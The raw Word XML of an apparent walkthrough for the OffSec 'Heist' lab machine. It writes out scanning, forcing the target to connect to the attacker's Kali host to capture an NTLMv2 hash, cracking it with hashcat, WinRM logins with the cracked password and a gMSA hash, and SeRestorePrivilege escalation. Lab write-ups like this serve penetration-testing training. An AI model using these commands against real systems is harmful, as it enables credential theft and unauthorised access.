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699729A3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r w:rsidR="00E00627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Heist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3F1D0EEF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7478C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007478C4" w:rsidRPr="007478C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rustscan --addresses 192.168.231.165 --ulimit 5000 -- -A -sC -Pn -sV -T 1500</w:t>
      </w:r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77F481DA" w14:textId="77777777" w:rsidR="007478C4" w:rsidRPr="007478C4" w:rsidRDefault="007478C4" w:rsidP="007478C4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007478C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>click the search icon after entering the following in the “Enter URL” bar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78971789" w14:textId="63123756" w:rsidR="00843DCE" w:rsidRPr="00647E40" w:rsidRDefault="007478C4" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007478C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://[Kali IP]:445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F72D7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4CEBA2A1" w14:textId="45DBF4E6" w:rsidR="00843DCE" w:rsidRDefault="00647E40" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00647E40">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>responder -I tun0 -wv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3620FF8B" w14:textId="0F899D02" w:rsidR="00843DCE" w:rsidRDefault="00647E40" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00647E40">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>forward a request to our Kali IP on port 80, which did not show as open in our previous rustscan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D63AECF" w14:textId="0F774FB2" w:rsidR="00647E40" w:rsidRDefault="005B5A13" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B5A13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>our Responder response contains an NTLMv2 hash for the user enox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C38A80D" w14:textId="77777777" w:rsidR="005B5A13" w:rsidRPr="005B5A13" w:rsidRDefault="005B5A13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28CC8CBC" w14:textId="40CDB518" w:rsidR="00843DCE" w:rsidRDefault="005B5A13" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B5A13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hashcat -h | grep -i “ntlmv2” hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt -o cracked.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B3FFB3" w14:textId="50F24F36" w:rsidR="005B5A13" w:rsidRDefault="005B5A13" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B5A13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>crackmapexec winrm 192.168.123.165 -d heist.offsec -u enox -p california -x “whoami”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD5CA71" w14:textId="5A7D5EF7" w:rsidR="005B5A13" w:rsidRDefault="005B5A13" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B5A13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“evil-winrm -i 192.168.123.165 -u enox -p california”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2A148D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51D544F0" w14:textId="77777777" w:rsidR="002E733C" w:rsidRPr="002E733C" w:rsidRDefault="002E733C" w:rsidP="002E733C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E733C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>We type “net user enox” and observe that the current user “enox” belongs to the “Web Admins” group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C2DC30" w14:textId="7DC289B5" w:rsidR="00843DCE" w:rsidRDefault="002E733C" w:rsidP="002E733C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E733C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Press enter or click to view image in full size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A0D543" w14:textId="40422AFA" w:rsidR="002E733C" w:rsidRPr="002E733C" w:rsidRDefault="002E733C" w:rsidP="002E733C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E733C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PowerUp.ps1 and other privilege escalation scripts in an attempt to list Privilege Escalation vectors, but nothing is discovered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535B1A35" w14:textId="5ADA3C76" w:rsidR="002E733C" w:rsidRDefault="002E733C" w:rsidP="002E733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start bloodhound and transfer the files via shell and notice what</w:t>
      </w:r>
      <w:r w:rsidR="00AD7818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s the connections are</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A765D0" w14:textId="0D7B867A" w:rsidR="002E733C" w:rsidRPr="003D42F2" w:rsidRDefault="003D42F2" w:rsidP="002E733C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D42F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Shortest Paths to High Value Targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702B125B" w14:textId="698FB90D" w:rsidR="002E733C" w:rsidRPr="003D42F2" w:rsidRDefault="003D42F2" w:rsidP="002E733C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D42F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>svc_apache service account is a Group Managed Service Account (gMSA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34089567" w14:textId="01EDB081" w:rsidR="002E733C" w:rsidRDefault="003D42F2" w:rsidP="002E733C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D42F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. .\PowerView.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BFD2F2" w14:textId="74370020" w:rsidR="003D42F2" w:rsidRDefault="003D42F2" w:rsidP="002E733C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D42F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Get-ADGroupMember ‘Web Admins’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = to become the web admin of enox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E7F5C7" w14:textId="478FAD77" w:rsidR="00451201" w:rsidRDefault="00451201" w:rsidP="002E733C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00451201">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.\GMSAPasswordReader.exe — AccountName ‘svc_apache’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F240D6" w14:textId="7402621C" w:rsidR="00451201" w:rsidRDefault="00451201" w:rsidP="002E733C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00451201">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>evil-winrm -i 192.168.81.165 -u svc_apache$ -H 4283B392D3647F3F26D614EE3AB9A80C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B596424" w14:textId="77777777" w:rsidR="00451201" w:rsidRPr="00451201" w:rsidRDefault="00451201" w:rsidP="002E733C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69EE3434" w14:textId="6CB448E9" w:rsidR="00451201" w:rsidRPr="00451201" w:rsidRDefault="00451201" w:rsidP="002E733C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00451201">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>whoami /priv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782BCD57" w14:textId="0F2CC64D" w:rsidR="00451201" w:rsidRPr="00451201" w:rsidRDefault="00451201" w:rsidP="002E733C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00451201">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“SeRestorePrivilege privilege escalation” on Google and discover the Hacktricks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFA854C" w14:textId="4346B981" w:rsidR="002E733C" w:rsidRDefault="00451201" w:rsidP="002E733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and we are root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6922CFE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0C0D8C61" w14:textId="4D6F88AA" w:rsidR="00A311DF" w:rsidRPr="00E70F7A" w:rsidRDefault="00E70F7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On Desktop we have proof.txt</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A311DF" w:rsidRPr="00E70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97C41"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4CE2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49718B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="77E8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398208">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="29653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C3180"/>
    <w:rsid w:val="002E733C"/>
    <w:rsid w:val="003D42F2"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="00451201"/>
    <w:rsid w:val="005B5A13"/>
    <w:rsid w:val="00647E40"/>
    <w:rsid w:val="007478C4"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="008C5E6C"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00AD7818"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00E00627"/>
    <w:rsid w:val="00E70F7A"/>
    <w:rsid w:val="00F5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11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-19T17:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>